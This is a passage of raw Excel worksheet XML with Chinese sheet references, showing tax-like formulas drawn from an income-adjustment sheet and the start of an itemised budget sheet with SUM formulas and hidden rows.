      <c r="H45" s="3"/>
    </row>
    <row r="46" spans="1:8">
      <c r="A46" s="3" t="s">
        <v>164</v>
      </c>
      <c r="B46" s="3">
        <f>(收入调整!B8+收入调整!B9+收入调整!B12+收入调整!B14)*0.12</f>
        <v>2040</v>
      </c>
      <c r="C46" s="3">
        <f>(收入调整!C8+收入调整!C9+收入调整!C12+收入调整!C14)*0.12</f>
        <v>1807.8</v>
      </c>
      <c r="D46" s="3">
        <f>(收入调整!D8+收入调整!D9+收入调整!D12+收入调整!D14)*0.12</f>
        <v>1646.6399999999999</v>
      </c>
      <c r="E46" s="3">
        <f>(收入调整!F8+收入调整!F9+收入调整!F12+收入调整!F14)*0.12</f>
        <v>199.2</v>
      </c>
      <c r="F46" s="3">
        <f>B46+E46</f>
        <v>2239.1999999999998</v>
      </c>
      <c r="G46" s="37">
        <f t="shared" si="2"/>
        <v>0.23863259210089605</v>
      </c>
      <c r="H46" s="3"/>
    </row>
    <row r="47" spans="1:8">
      <c r="A47" s="3" t="s">
        <v>165</v>
      </c>
      <c r="B47" s="3">
        <f>收入调整!B11*0.125</f>
        <v>37.5</v>
      </c>
      <c r="C47" s="3">
        <v>2322</v>
      </c>
      <c r="D47" s="3">
        <f>收入调整!D11*0.125</f>
        <v>73.75</v>
      </c>
      <c r="E47" s="3">
        <f>收入调整!F11*0.125</f>
        <v>43.75</v>
      </c>
      <c r="F47" s="3">
        <f>B47+E47</f>
        <v>81.25</v>
      </c>
      <c r="G47" s="37">
        <f t="shared" si="2"/>
        <v>-0.96500861326442722</v>
      </c>
      <c r="H47" s="3"/>
    </row>
    <row r="48" spans="1:8">
      <c r="A48" s="3" t="s">
        <v>166</v>
      </c>
      <c r="B48" s="3">
        <f>收入调整!B15*0.25</f>
        <v>25</v>
      </c>
      <c r="C48" s="3">
        <f>收入调整!C15*0.25</f>
        <v>21.25</v>
      </c>
      <c r="D48" s="3">
        <f>收入调整!D15*0.25</f>
        <v>13</v>
      </c>
      <c r="E48" s="3">
        <f>收入调整!F15*0.25</f>
        <v>-5</v>
      </c>
      <c r="F48" s="3">
        <f>B48+E48</f>
        <v>20</v>
      </c>
      <c r="G48" s="37">
        <f t="shared" si="2"/>
        <v>-5.8823529411764705E-2</v>
      </c>
      <c r="H48" s="3"/>
    </row>
    <row r="49" spans="1:8">
      <c r="A49" s="3" t="s">
        <v>167</v>
      </c>
      <c r="B49" s="3">
        <f>收入调整!B19*0.3</f>
        <v>990</v>
      </c>
      <c r="C49" s="3">
        <f>收入调整!C19*0.3</f>
        <v>894.3</v>
      </c>
      <c r="D49" s="3">
        <f>收入调整!D19*0.3</f>
        <v>1333.2</v>
      </c>
      <c r="E49" s="3">
        <f>收入调整!F19*0.3</f>
        <v>300</v>
      </c>
      <c r="F49" s="3">
        <f>B49+E49</f>
        <v>1290</v>
      </c>
      <c r="G49" s="37">
        <f t="shared" si="2"/>
        <v>0.44246897014424696</v>
      </c>
      <c r="H49" s="3"/>
    </row>
    <row r="50" spans="1:8" s="32" customFormat="1">
      <c r="A50" s="5" t="s">
        <v>168</v>
      </c>
      <c r="B50" s="5">
        <f t="shared" ref="B50" si="12">SUM(B39:B49)-B40-B44</f>
        <v>180247.4</v>
      </c>
      <c r="C50" s="5">
        <f>SUM(C39:C49)-C40-C44</f>
        <v>168456.39999999997</v>
      </c>
      <c r="D50" s="5">
        <f>SUM(D39:D49)-D40-D44</f>
        <v>127423.40000000005</v>
      </c>
      <c r="E50" s="5">
        <f>SUM(E39:E49)-E40-E44</f>
        <v>-11247</v>
      </c>
      <c r="F50" s="5">
        <f>SUM(F39:F49)-F40-F44</f>
        <v>169000.40000000002</v>
      </c>
      <c r="G50" s="36">
        <f t="shared" si="2"/>
        <v>3.2293222459939684E-3</v>
      </c>
      <c r="H50" s="5"/>
    </row>
    <row r="51" spans="1:8" s="32" customFormat="1">
      <c r="A51" s="5" t="s">
        <v>169</v>
      </c>
      <c r="B51" s="5">
        <f>收入调整!B5</f>
        <v>62000</v>
      </c>
      <c r="C51" s="5">
        <f>收入调整!C5</f>
        <v>37361</v>
      </c>
      <c r="D51" s="5">
        <f>收入调整!D5</f>
        <v>44979</v>
      </c>
      <c r="E51" s="5">
        <f>收入调整!F5</f>
        <v>-5000</v>
      </c>
      <c r="F51" s="5">
        <f>收入调整!G5</f>
        <v>57000</v>
      </c>
      <c r="G51" s="36">
        <f t="shared" si="2"/>
        <v>0.52565509488504059</v>
      </c>
      <c r="H51" s="5"/>
    </row>
    <row r="52" spans="1:8" s="32" customFormat="1">
      <c r="A52" s="5" t="s">
        <v>170</v>
      </c>
      <c r="B52" s="5">
        <f>收入调整!B10</f>
        <v>64000</v>
      </c>
      <c r="C52" s="5">
        <f>收入调整!C10</f>
        <v>57423</v>
      </c>
      <c r="D52" s="5">
        <f>收入调整!D10</f>
        <v>36759</v>
      </c>
      <c r="E52" s="5">
        <f>收入调整!F10</f>
        <v>-15000</v>
      </c>
      <c r="F52" s="5">
        <f>收入调整!G10</f>
        <v>49000</v>
      </c>
      <c r="G52" s="36">
        <f t="shared" si="2"/>
        <v>-0.14668338470647649</v>
      </c>
      <c r="H52" s="5"/>
    </row>
    <row r="53" spans="1:8" s="32" customFormat="1">
      <c r="A53" s="5" t="s">
        <v>171</v>
      </c>
      <c r="B53" s="5">
        <f>收入调整!B29</f>
        <v>54248</v>
      </c>
      <c r="C53" s="5">
        <f>收入调整!C29</f>
        <v>73672</v>
      </c>
      <c r="D53" s="5">
        <f>收入调整!D29</f>
        <v>45685</v>
      </c>
      <c r="E53" s="5">
        <f>收入调整!F29</f>
        <v>8752</v>
      </c>
      <c r="F53" s="5">
        <f>收入调整!G29</f>
        <v>63000</v>
      </c>
      <c r="G53" s="36">
        <f t="shared" si="2"/>
        <v>-0.14485829080247584</v>
      </c>
      <c r="H53" s="5"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="G2:H2"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.55000000000000004" right="0.55000000000000004" top="0.39305555555555599" bottom="0.39305555555555599" header="0.51180555555555596" footer="0.31388888888888899"/>
  <pageSetup paperSize="9" scale="90" firstPageNumber="4" orientation="landscape" useFirstPageNumber="1"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C&amp;P</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet4.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetPr filterMode="1"/>
  <dimension ref="A1:F183"/>
  <sheetViews>
    <sheetView showZeros="0" workbookViewId="0">
      <pane xSplit="3" ySplit="3" topLeftCell="D4" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" sqref="A1:E1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="13.75" defaultRowHeight="21.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="7.25" hidden="1" customWidth="1"/>
    <col min="2" max="2" width="56.875" customWidth="1"/>
    <col min="3" max="3" width="29" customWidth="1"/>
    <col min="4" max="4" width="10.75" customWidth="1"/>
    <col min="5" max="5" width="25.625" customWidth="1"/>
    <col min="7" max="7" width="29.125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="21.75" customHeight="1">
      <c r="A1" s="63" t="s">
        <v>806</v>
      </c>
      <c r="B1" s="63"/>
      <c r="C1" s="63"/>
      <c r="D1" s="63"/>
      <c r="E1" s="63"/>
    </row>
    <row r="2" spans="1:6" ht="21.75" customHeight="1">
      <c r="E2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="27" customHeight="1">
      <c r="A3" t="s">
        <v>172</v>
      </c>
      <c r="B3" s="26" t="s">
        <v>173</v>
      </c>
      <c r="C3" s="26" t="s">
        <v>174</v>
      </c>
      <c r="D3" s="26" t="s">
        <v>175</v>
      </c>
      <c r="E3" s="6" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="4" spans="1:6" s="2" customFormat="1" ht="21.75" customHeight="1">
      <c r="B4" s="27" t="s">
        <v>176</v>
      </c>
      <c r="C4" s="28"/>
      <c r="D4" s="28">
        <f>D5+D7+D9</f>
        <v>174915.58859999999</v>
      </c>
      <c r="E4" s="28"/>
    </row>
    <row r="5" spans="1:6" s="2" customFormat="1" ht="22.5" customHeight="1">
      <c r="B5" s="5" t="s">
        <v>177</v>
      </c>
      <c r="C5" s="29"/>
      <c r="D5" s="5">
        <v>1676</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="28.5" customHeight="1">
      <c r="B6" s="30" t="s">
        <v>178</v>
      </c>
      <c r="C6" s="18"/>
      <c r="D6" s="3">
        <v>1676</v>
      </c>
      <c r="E6" s="31" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="7" spans="1:6" s="2" customFormat="1" ht="81" customHeight="1">
      <c r="B7" s="31" t="s">
        <v>180</v>
      </c>
      <c r="C7" s="11" t="s">
        <v>181</v>
      </c>
      <c r="D7" s="31">
        <v>167198</v>
      </c>
      <c r="E7" s="31" t="s">
        <v>800</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="14.25" hidden="1">
      <c r="B8" t="s">
        <v>182</v>
      </c>
      <c r="D8">
        <f>收支总表!R28</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:6" s="2" customFormat="1" ht="52.5" customHeight="1">
      <c r="B9" s="31" t="s">
        <v>183</v>
      </c>
      <c r="C9" s="11" t="s">
        <v>181</v>
      </c>
      <c r="D9" s="31">
        <f>D10+D68+D76+D80+D88+D95+D101+D106+D116+D120+D152+D158+D173+D177+D179+D181+D182</f>
        <v>6041.5886</v>
      </c>
      <c r="E9" s="31" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="10" spans="1:6" s="2" customFormat="1" ht="31.5" customHeight="1">
      <c r="B10" s="28" t="s">
        <v>185</v>
      </c>
      <c r="C10" s="28"/>
      <c r="D10" s="28">
        <f>SUM(D11:D33)</f>
        <v>1433.9109000000001</v>
      </c>
      <c r="E10" s="28"/>
    </row>
    <row r="11" spans="1:6" ht="21.75" customHeight="1">
      <c r="A11" t="s">
        <v>186</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>187</v>
      </c>
      <c r="C11" s="6" t="s">
        <v>188</v>
      </c>
      <c r="D11" s="6">
        <v>15</v>
      </c>
      <c r="E11" s="6"/>
    </row>
    <row r="12" spans="1:6" ht="55.5" customHeight="1">
      <c r="A12" t="s">
        <v>186</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>189</v>
      </c>
      <c r="C12" s="6" t="s">
        <v>190</v>
      </c>
      <c r="D12" s="6">
        <f>47.6+15+20</f>
        <v>82.6</v>
      </c>
      <c r="E12" s="6"/>
      <c r="F12">
        <v>35</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="44.25" customHeight="1">
      <c r="A13" t="s">
        <v>186</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>191</v>
      </c>
      <c r="C13" s="6" t="s">
        <v>192</v>
      </c>
      <c r="D13" s="6">
        <f>27.6869+25</f>
        <v>52.686900000000001</v>
      </c>
      <c r="E13" s="6"/>
    </row>
    <row r="14" spans="1:6" ht="21.75" customHeight="1">
      <c r="A14" t="s">
        <v>186</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>193</v>
      </c>
      <c r="C14" s="6" t="s">
        <v>194</v>
      </c>
      <c r="D14" s="6">
        <v>3.15</v>
      </c>
      <c r="E14" s="6"/>
    </row>
    <row r="15" spans="1:6" ht="21.75" customHeight="1">
      <c r="A15" t="s">
        <v>186</v>
      </c>
      <c r="B15" s="6" t="s">
        <v>195</v>
      </c>
      <c r="C15" s="6" t="s">
        <v>196</v>
      </c>
      <c r="D15" s="6">
        <f>9+28</f>
        <v>37</v>
      </c>
      <c r="E15" s="6"/>
    </row>
    <row r="16" spans="1:6" ht="21.75" customHeight="1">
      <c r="A16" t="s">
        <v>186</v>
      </c>
      <c r="B16" s="6" t="s">
        <v>197</v>
      </c>
      <c r="C16" s="6" t="s">
        <v>198</v>
      </c>
      <c r="D16" s="6">
        <v>50</v>
      </c>
      <c r="E16" s="6"/>
    </row>
    <row r="17" spans="1:6" ht="39" customHeight="1">
      <c r="A17" t="s">
        <v>186</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>199</v>
      </c>
      <c r="C17" s="6" t="s">
        <v>200</v>
      </c>
      <c r="D17" s="6">
        <v>57.96</v>
      </c>
      <c r="E17" s="6"/>
    </row>
    <row r="18" spans="1:6" ht="21.75" customHeight="1">
      <c r="A18" t="s">
        <v>186</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>201</v>
      </c>
      <c r="C18" s="6" t="s">
        <v>202</v>
      </c>
      <c r="D18" s="6">
        <v>120</v>
      </c>
      <c r="E18" s="6"/>
    </row>
    <row r="19" spans="1:6" ht="30" customHeight="1">
      <c r="A19" t="s">
        <v>186</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>203</v>
      </c>
      <c r="C19" s="6" t="s">
        <v>204</v>
      </c>
      <c r="D19" s="6">
        <v>20</v>
      </c>
      <c r="E19" s="6"/>
      <c r="F19">
        <v>20</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="30.75" customHeight="1">
      <c r="A20" t="s">
        <v>186</v>
      </c>
      <c r="B20" s="6" t="s">
        <v>205</v>
      </c>
      <c r="C20" s="6" t="s">
        <v>206</v>
      </c>
      <c r="D20" s="6">
        <v>5</v>
      </c>
      <c r="E20" s="6"/>
    </row>
    <row r="21" spans="1:6" ht="21.75" customHeight="1">
      <c r="A21" t="s">
        <v>186</v>
      </c>
      <c r="B21" s="6" t="s">
        <v>207</v>
      </c>
      <c r="C21" s="6" t="s">
        <v>208</v>
      </c>
      <c r="D21" s="6">
        <v>8</v>
      </c>
      <c r="E21" s="6"/>
    </row>
    <row r="22" spans="1:6" ht="21.75" customHeight="1">
      <c r="A22" t="s">
        <v>186</v>
      </c>
      <c r="B22" s="6" t="s">
        <v>209</v>
      </c>
      <c r="C22" s="6" t="s">
        <v>210</v>
      </c>
      <c r="D22" s="6">
        <f>4+7</f>
        <v>11</v>
      </c>
      <c r="E22" s="6"/>
    </row>
    <row r="23" spans="1:6" ht="21.75" customHeight="1">
      <c r="A23" t="s">
        <v>186</v>
      </c>
      <c r="B23" s="6" t="s">
        <v>211</v>
      </c>
      <c r="C23" s="6" t="s">
        <v>212</v>
      </c>
      <c r="D23" s="6">
        <v>77.599999999999994</v>
      </c>
      <c r="E23" s="6"/>
    </row>
    <row r="24" spans="1:6" ht="21.75" customHeight="1">
      <c r="A24" t="s">
        <v>186</v>
      </c>
      <c r="B24" s="6" t="s">
        <v>213</v>
      </c>
      <c r="C24" s="6" t="s">
        <v>214</v>
      </c>
      <c r="D24" s="6">
        <v>3</v>
      </c>
      <c r="E24" s="6"/>
    </row>
    <row r="25" spans="1:6" ht="32.25" customHeight="1">
      <c r="A25" t="s">
        <v>186</v>
      </c>
      <c r="B25" s="6" t="s">
        <v>215</v>
      </c>
      <c r="C25" s="6" t="s">
        <v>216</v>
      </c>
      <c r="D25" s="6">
        <v>59</v>
      </c>
      <c r="E25" s="6"/>
    </row>
    <row r="26" spans="1:6" ht="32.25" customHeight="1">
      <c r="A26" t="s">
        <v>186</v>
      </c>
      <c r="B26" s="6" t="s">
        <v>217</v>
      </c>
      <c r="C26" s="6" t="s">
        <v>218</v>
      </c>
      <c r="D26" s="6">
        <v>27.094000000000001</v>
      </c>
      <c r="E26" s="6"/>
    </row>
    <row r="27" spans="1:6" ht="21.75" customHeight="1">
      <c r="A27" t="s">
        <v>186</v>
      </c>
      <c r="B27" s="6" t="s">
        <v>219</v>
      </c>
      <c r="C27" s="6" t="s">
        <v>220</v>
      </c>
      <c r="D27" s="6">
        <v>30</v>
      </c>
      <c r="E27" s="6"/>
    </row>
    <row r="28" spans="1:6" ht="21.75" customHeight="1">
      <c r="A28" t="s">
        <v>186</v>
      </c>
      <c r="B28" s="6" t="s">
        <v>221</v>
      </c>
      <c r="C28" s="6" t="s">
        <v>222</v>
      </c>
      <c r="D28" s="6">
        <v>5</v>
      </c>
      <c r="E28" s="6"/>
    </row>
    <row r="29" spans="1:6" ht="34.5" customHeight="1">
      <c r="A29" t="s">
        <v>186</v>
      </c>
      <c r="B29" s="6" t="s">
        <v>223</v>
      </c>
      <c r="C29" s="6" t="s">
        <v>224</v>
      </c>
      <c r="D29" s="6">
        <f>8+58</f>
        <v>66</v>
      </c>
      <c r="E29" s="6"/>
    </row>
    <row r="30" spans="1:6" ht="30.75" customHeight="1">
      <c r="A30" t="s">
        <v>186</v>
      </c>
      <c r="B30" s="6" t="s">
        <v>225</v>
      </c>
      <c r="C30" s="6" t="s">
        <v>226</v>
      </c>
      <c r="D30" s="6">
        <v>29.52</v>
      </c>
      <c r="E30" s="6"/>
    </row>
    <row r="31" spans="1:6" ht="21.75" customHeight="1">
      <c r="A31" t="s">
        <v>186</v>
      </c>
      <c r="B31" s="6" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="6" t="s">
        <v>228</v>
      </c>
      <c r="D31" s="6">
        <v>6</v>
      </c>
      <c r="E31" s="6"/>
    </row>
    <row r="32" spans="1:6" ht="21.75" customHeight="1">
      <c r="A32" t="s">
        <v>186</v>
      </c>
      <c r="B32" s="6" t="s">
        <v>229</v>
      </c>
      <c r="C32" s="6" t="s">
        <v>230</v>
      </c>
      <c r="D32" s="6">
        <f>99.6+35.2</f>
        <v>134.80000000000001</v>
      </c>
      <c r="E32" s="6"/>
    </row>
    <row r="33" spans="1:5" ht="43.5" customHeight="1">
      <c r="A33" t="s">
        <v>186</v>
      </c>
      <c r="B33" s="6" t="s">
        <v>231</v>
      </c>
      <c r="C33" s="6" t="s">
        <v>232</v>
      </c>
      <c r="D33" s="6">
        <f>312.5+15+15+10+69+96-29+24+21</f>
        <v>533.5</v>
      </c>
      <c r="E33" s="6"/>
    </row>
    <row r="34" spans="1:5" ht="14.25" hidden="1">
      <c r="A34" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="35" spans="1:5" ht="14.25" hidden="1">
      <c r="A35" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="36" spans="1:5" ht="14.25" hidden="1">
      <c r="A36" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="37" spans="1:5" ht="14.25" hidden="1">
      <c r="A37" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="38" spans="1:5" ht="14.25" hidden="1">
      <c r="A38" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="39" spans="1:5" ht="14.25" hidden="1">
      <c r="A39" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="40" spans="1:5" ht="14.25" hidden="1">
      <c r="A40" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="41" spans="1:5" ht="14.25" hidden="1">
      <c r="A41" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="42" spans="1:5" ht="14.25" hidden="1">
      <c r="A42" t="s">
        <v>234</v>
      </c>
    </row>
    <row r="43" spans="1:5" ht="14.25" hidden="1">
      <c r="A43" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="44" spans="1:5" ht="14.25" hidden="1">
      <c r="A44" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="45" spans="1:5" ht="14.25" hidden="1">
      <c r="A45" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="46" spans="1:5" ht="14.25" hidden="1">
      <c r="A46" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="47" spans="1:5" ht="14.25" hidden="1">
      <c r="A47" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="48" spans="1:5" ht="14.25" hidden="1">
      <c r="A48" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="49" spans="1:1" ht="14.25" hidden="1">
      <c r="A49" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="50" spans="1:1" ht="14.25" hidden="1">
      <c r="A50" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="51" spans="1:1" ht="14.25" hidden="1">
      <c r="A51" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="52" spans="1:1" ht="14.25" hidden="1">
      <c r="A52" t="s">
        <v>235</v>
      </c>
    </row>
    <row r="53" spans="1:1" ht="14.25" hidden="1">
      <c r="A53" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="54" spans="1:1" ht="14.25" hidden="1">
      <c r="A54" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="55" spans="1:1" ht="14.25" hidden="1">
      <c r="A55" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="56" spans="1:1" ht="14.25" hidden="1">
      <c r="A56" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="57" spans="1:1" ht="14.25" hidden="1">
      <c r="A57" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="58" spans="1:1" ht="14.25" hidden="1">
      <c r="A58" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="59" spans="1:1" ht="14.25" hidden="1">
      <c r="A59" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="60" spans="1:1" ht="14.25" hidden="1">
      <c r="A60" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="61" spans="1:1" ht="14.25" hidden="1">
      <c r="A61" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="62" spans="1:1" ht="14.25" hidden="1">
      <c r="A62" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="63" spans="1:1" ht="14.25" hidden="1">
      <c r="A63" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="64" spans="1:1" ht="14.25" hidden="1">
      <c r="A64" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="65" spans="1:5" ht="14.25" hidden="1">
      <c r="A65" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="66" spans="1:5" ht="14.25" hidden="1">
      <c r="A66" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="67" spans="1:5" ht="14.25" hidden="1">
      <c r="A67">
        <v>201</v>
      </c>
    </row>
    <row r="68" spans="1:5" s="2" customFormat="1" ht="34.5" customHeight="1">
      <c r="B68" s="28" t="s">
        <v>243</v>
      </c>
      <c r="C68" s="28"/>
      <c r="D68" s="28">
        <f>SUM(D69:D75)</f>
        <v>745.15900000000011</v>
      </c>
      <c r="E68" s="28"/>
    </row>
    <row r="69" spans="1:5" ht="46.5" customHeight="1">
      <c r="A69" t="s">
        <v>244</v>
      </c>
      <c r="B69" s="6" t="s">
        <v>245</v>
      </c>
      <c r="C69" s="6" t="s">
        <v>246</v>
      </c>
      <c r="D69" s="6">
        <f>204.709+300+100</f>
        <v>604.70900000000006</v>
      </c>
      <c r="E69" s="6"/>
    </row>
    <row r="70" spans="1:5" ht="21.75" customHeight="1">
      <c r="A70" t="s">
        <v>233</v>
      </c>
      <c r="B70" s="6" t="s">
        <v>247</v>
      </c>
      <c r="C70" s="6" t="s">
        <v>248</v>
      </c>
      <c r="D70" s="6">
        <v>59</v>
      </c>
      <c r="E70" s="6"/>
    </row>
    <row r="71" spans="1:5" ht="21.75" customHeight="1">
      <c r="A71" t="s">
        <v>233</v>
      </c>
      <c r="B71" s="6" t="s">
        <v>249</v>
      </c>
      <c r="C71" s="6" t="s">
        <v>250</v>
      </c>
      <c r="D71" s="6">
        <v>25.7</v>
      </c>
      <c r="E71" s="6"/>
    </row>
    <row r="72" spans="1:5" ht="21.75" customHeight="1">
      <c r="A72" t="s">
        <v>233</v>
      </c>
      <c r="B72" s="6" t="s">
        <v>251</v>
      </c>
      <c r="C72" s="6" t="s">
        <v>252</v>
      </c>
      <c r="D72" s="6">
        <v>46.75</v>
      </c>
      <c r="E72" s="6"/>
    </row>
    <row r="73" spans="1:5" ht="21.75" customHeight="1">
      <c r="A73" t="s">
        <v>233</v>
      </c>
      <c r="B73" s="6" t="s">
        <v>253</v>
      </c>
      <c r="C73" s="6" t="s">
        <v>254</v>
      </c>
      <c r="D73" s="6">
        <v>9</v>
      </c>
      <c r="E73" s="6"/>
    </row>
    <row r="74" spans="1:5" ht="14.25" hidden="1">
      <c r="A74" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="75" spans="1:5" ht="14.25" hidden="1">
      <c r="A75" t="s">
        <v>233</v>
      </c>
    </row>
    <row r="76" spans="1:5" s="2" customFormat="1" ht="28.5" customHeight="1">
      <c r="B76" s="28" t="s">
        <v>255</v>
      </c>
      <c r="C76" s="28"/>
      <c r="D76" s="28">
        <f>SUM(D77:D79)</f>
        <v>88.5</v>
      </c>
      <c r="E76" s="28"/>
    </row>
    <row r="77" spans="1:5" ht="21.75" customHeight="1">
      <c r="A77" t="s">
        <v>234</v>
      </c>
      <c r="B77" s="6" t="s">
        <v>256</v>
      </c>
      <c r="C77" s="6" t="s">
        <v>257</v>
      </c>
      <c r="D77" s="6">
        <v>30</v>
      </c>
      <c r="E77" s="6"/>
    </row>
    <row r="78" spans="1:5" ht="21.75" customHeight="1">
      <c r="A78" t="s">
        <v>234</v>
      </c>
      <c r="B78" s="6" t="s">
        <v>258</v>
      </c>
      <c r="C78" s="6" t="s">
        <v>259</v>
      </c>
      <c r="D78" s="6">
        <v>48.5</v>
      </c>
      <c r="E78" s="6"/>
    </row>
    <row r="79" spans="1:5" ht="21.75" customHeight="1">
      <c r="A79" t="s">
        <v>234</v>
      </c>
      <c r="B79" s="6" t="s">
        <v>260</v>
      </c>
      <c r="C79" s="6" t="s">
        <v>261</v>
      </c>
      <c r="D79" s="6">
        <v>10</v>
      </c>
      <c r="E79" s="6"/>
    </row>
    <row r="80" spans="1:5" s="2" customFormat="1" ht="30" customHeight="1">
      <c r="B80" s="28" t="s">
        <v>262</v>
      </c>
      <c r="C80" s="28"/>
      <c r="D80" s="28">
        <f>SUM(D81:D87)</f>
        <v>198</v>
      </c>
      <c r="E80" s="28"/>
    </row>
    <row r="81" spans="1:6" ht="21.75" customHeight="1">
      <c r="A81" t="s">
        <v>236</v>
      </c>
      <c r="B81" s="6" t="s">
        <v>263</v>
      </c>
      <c r="C81" s="6" t="s">
        <v>264</v>
      </c>
      <c r="D81" s="6">
        <v>70</v>
      </c>
      <c r="E81" s="6"/>
    </row>
    <row r="82" spans="1:6" ht="21.75" customHeight="1">
      <c r="A82" t="s">
        <v>236</v>
      </c>
      <c r="B82" s="6" t="s">
        <v>265</v>
      </c>
      <c r="C82" s="6" t="s">
        <v>266</v>
      </c>
      <c r="D82" s="6">
        <v>14</v>
      </c>
      <c r="E82" s="6"/>
    </row>
    <row r="83" spans="1:6" ht="21.75" customHeight="1">
      <c r="A83" t="s">
        <v>236</v>
      </c>
      <c r="B83" s="6" t="s">
        <v>267</v>
      </c>
      <c r="C83" s="6" t="s">
        <v>268</v>
      </c>
      <c r="D83" s="6">
        <v>39</v>
      </c>
      <c r="E83" s="6"/>
    </row>
    <row r="84" spans="1:6" ht="39.75" customHeight="1">
      <c r="A84" t="s">
        <v>236</v>
      </c>
      <c r="B84" s="6" t="s">
        <v>269</v>
      </c>
      <c r="C84" s="6" t="s">
        <v>270</v>
      </c>
      <c r="D84" s="6">
        <v>62</v>
      </c>
      <c r="E84" s="6"/>
    </row>
    <row r="85" spans="1:6" ht="21.75" customHeight="1">
      <c r="A85" t="s">
        <v>236</v>
      </c>
      <c r="B85" s="6" t="s">
        <v>271</v>
      </c>
      <c r="C85" s="6" t="s">
        <v>272</v>
      </c>
      <c r="D85" s="6">
        <v>3</v>
      </c>
      <c r="E85" s="6"/>
    </row>
    <row r="86" spans="1:6" ht="21.75" customHeight="1">
      <c r="A86" t="s">
        <v>236</v>
      </c>
      <c r="B86" s="6" t="s">
        <v>273</v>
      </c>
      <c r="C86" s="6" t="s">
        <v>274</v>
      </c>
      <c r="D86" s="6">
        <v>10</v>
      </c>
      <c r="E86" s="6"/>
      <c r="F86">
        <v>10</v>
      </c>
    </row>
    <row r="87" spans="1:6" ht="14.25" hidden="1">
      <c r="A87" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="88" spans="1:6" s="2" customFormat="1" ht="30" customHeight="1">
      <c r="B88" s="28" t="s">
        <v>275</v>
      </c>
      <c r="C88" s="28"/>
      <c r="D88" s="28">
        <f>SUM(D89:D90)</f>
        <v>94.107700000000008</v>
      </c>
      <c r="E88" s="28"/>
    </row>
    <row r="89" spans="1:6" ht="21.75" customHeight="1">
      <c r="A89" t="s">
        <v>186</v>
      </c>
      <c r="B89" s="6" t="s">
        <v>276</v>
      </c>
      <c r="C89" s="6" t="s">
        <v>277</v>
      </c>
      <c r="D89" s="6">
        <f>20+72.072</f>
        <v>92.072000000000003</v>
      </c>
      <c r="E89" s="6"/>
    </row>
    <row r="90" spans="1:6" ht="21.75" customHeight="1">
      <c r="A90" t="s">
        <v>278</v>
      </c>
      <c r="B90" s="6" t="s">
        <v>279</v>
      </c>
      <c r="C90" s="6" t="s">
        <v>280</v>
      </c>
      <c r="D90" s="6">
        <v>2.0356999999999998</v>
      </c>
      <c r="E90" s="6"/>
    </row>
    <row r="91" spans="1:6" ht="14.25" hidden="1">
      <c r="A91" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="92" spans="1:6" ht="14.25" hidden="1">
      <c r="A92" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="93" spans="1:6" ht="14.25" hidden="1">
      <c r="A93" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="94" spans="1:6" ht="14.25" hidden="1">
      <c r="A94" t="s">
        <v>278</v>
      </c>
    </row>
